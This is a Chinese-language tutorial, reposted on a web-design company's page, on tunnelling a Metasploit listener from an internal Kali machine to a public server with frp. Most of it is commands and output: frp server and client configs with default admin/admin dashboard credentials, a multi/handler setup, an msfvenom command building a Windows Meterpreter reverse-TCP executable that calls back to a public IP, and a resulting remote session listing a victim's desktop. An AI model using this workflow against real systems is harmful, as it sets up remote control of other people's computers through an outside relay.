這篇文章主要講解了“內(nèi)網(wǎng)Metasploit映射到外網(wǎng)的方法是什么”,文中的講解內(nèi)容簡(jiǎn)單清晰,易于學(xué)習(xí)與理解,下面請(qǐng)大家跟著小編的思路慢慢深入,一起來研究和學(xué)習(xí)“內(nèi)網(wǎng)Metasploit映射到外網(wǎng)的方法是什么”吧!
公司主營(yíng)業(yè)務(wù):做網(wǎng)站、成都網(wǎng)站設(shè)計(jì)、移動(dòng)網(wǎng)站開發(fā)等業(yè)務(wù)。幫助企業(yè)客戶真正實(shí)現(xiàn)互聯(lián)網(wǎng)宣傳,提高企業(yè)的競(jìng)爭(zhēng)能力。創(chuàng)新互聯(lián)建站是一支青春激揚(yáng)、勤奮敬業(yè)、活力青春激揚(yáng)、勤奮敬業(yè)、活力澎湃、和諧高效的團(tuán)隊(duì)。公司秉承以“開放、自由、嚴(yán)謹(jǐn)、自律”為核心的企業(yè)文化,感謝他們對(duì)我們的高要求,感謝他們從不同領(lǐng)域給我們帶來的挑戰(zhàn),讓我們激情的團(tuán)隊(duì)有機(jī)會(huì)用頭腦與智慧不斷的給客戶帶來驚喜。創(chuàng)新互聯(lián)建站推出遼寧免費(fèi)做網(wǎng)站回饋大家。
下載frp
找到最新的releases下載,系統(tǒng)版本自行確認(rèn)。
下載方法:
wget https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.16.1_linux_amd64.tar.gz tar zxvf frp_0.16.1_linux_amd64.tar.gz cd frp_0.16.1_linux_amd64
公網(wǎng)服務(wù)器配置:
修改配置文件:
[yuyongxr@instance-2 frp_0.16.1_linux_amd64]$ vim frps.ini [common] bind_port = 7000 dashboard_port = 7500 dashboard_user = admin dashboard_pwd = admin
啟動(dòng)服務(wù):
[yuyongxr@instance-2 frp_0.16.1_linux_amd64]$ nohup ./frps -c frps.ini > log.txt &
kali linux 配置:
修改配置文件:
kali@kali:~/frp_0.16.1_linux_amd64$ vim frpc.ini [common] server_addr = xx.xx.xx.xx server_port = 7000 [msf] type = tcp local_ip = 127.0.0.1 local_port = 6666 remote_port = 4446
啟動(dòng)服務(wù):
kali@kali:~/frp_0.16.1_linux_amd64$ nohup ./frpc -c frpc.ini > log.txt &
metasploit配置:
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 127.0.0.1 lhost => 127.0.0.1 msf5 exploit(multi/handler) > set lport 6666 lport => 6666
生成payload文件:
e2a5e@kali:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=34.80.29.48 lport=4446 -f exe -o test.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 510 bytes Final size of exe file: 7168 bytes Saved as: test.exe
執(zhí)行payload文件,測(cè)試效果:
msf5 exploit(multi/handler) > exploit [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress? [*] Started reverse TCP handler on 127.0.0.1:6666 [*] Sending stage (206403 bytes) to 127.0.0.1 [*] Meterpreter session 1 opened (127.0.0.1:6666 -> 127.0.0.1:35992) at 2019-09-03 17:05:39 +0800 meterpreter > ls Listing: C:\Users\win7\Desktop ============================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 2309 fil 2019-08-30 11:12:41 +0800 Google Chrome.lnk 100777/rwxrwxrwx 10916080 fil 2019-08-30 11:57:01 +0800 PCHunter64.exe 40777/rwxrwxrwx 0 dir 2019-09-03 16:12:02 +0800 PanDownload 100666/rw-rw-rw- 282 fil 2018-09-11 09:18:55 +0800 desktop.ini 100777/rwxrwxrwx 7168 fil 2019-09-03 16:39:18 +0800 test.exe meterpreter >
感謝各位的閱讀,以上就是“內(nèi)網(wǎng)Metasploit映射到外網(wǎng)的方法是什么”的內(nèi)容了,經(jīng)過本文的學(xué)習(xí)后,相信大家對(duì)內(nèi)網(wǎng)Metasploit映射到外網(wǎng)的方法是什么這一問題有了更深刻的體會(huì),具體使用情況還需要大家實(shí)踐驗(yàn)證。這里是創(chuàng)新互聯(lián),小編將為大家推送更多相關(guān)知識(shí)點(diǎn)的文章,歡迎關(guān)注!
當(dāng)前名稱:內(nèi)網(wǎng)Metasploit映射到外網(wǎng)的方法是什么
文章出自:http://chinadenli.net/article4/iegdoe.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供軟件開發(fā)、手機(jī)網(wǎng)站建設(shè)、企業(yè)建站、自適應(yīng)網(wǎng)站、微信小程序、網(wǎng)站排名
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)